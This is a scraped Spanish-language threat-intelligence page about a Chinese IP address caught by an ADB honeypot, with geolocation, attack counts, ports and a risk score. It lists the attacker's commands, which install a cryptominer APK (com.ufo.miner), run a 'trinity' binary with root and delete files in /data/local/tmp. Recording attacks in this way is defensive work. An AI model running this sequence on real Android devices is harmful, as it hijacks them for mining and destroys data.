TROYANOSYVIRUS
Amenaza ActivaMEDIO

14.152.90.229

Pais de Origen🇨🇳 China
Primera Deteccion10/2/2026
Ultima Actividad3/5/2026
ISPCHINANET Guangdong province network
🎯
39
Ataques Totales
🔌
2
Puertos
📡
2
Tipos Ataque
🦠
4
Malware

Geolocalizacion

Pais
🇨🇳 China
Ciudad
Desconocida
ASN
AS134763
ISP
CHINANET Guangdong province network

Tipos de Ataque

adb_honeypot
malware_capture

Puertos Atacados

4455555

Malware Asociado

Comandos Ejecutados

$am start -n com.ufo.miner/com.example.test.MainActivity2x
$/data/local/tmp/nohup su -c /data/local/tmp/trinity2x
$ps | grep trinity2x
$rm /data/local/tmp/ufo.apk2x
$pm install /data/local/tmp/ufo.apk2x
$chmod 0755 /data/local/tmp/nohup2x
$chmod 0755 /data/local/tmp/trinity2x
$rm -rf /data/local/tmp/*2x
$pm path com.ufo.miner2x
$/data/local/tmp/nohup /data/local/tmp/trinity2x

Exposicion segun Shodan InternetDBShodan

Datos de InternetDB, actualizacion no en tiempo real

Evaluacion de Riesgo

50
/100
BajoMedioAltoCritico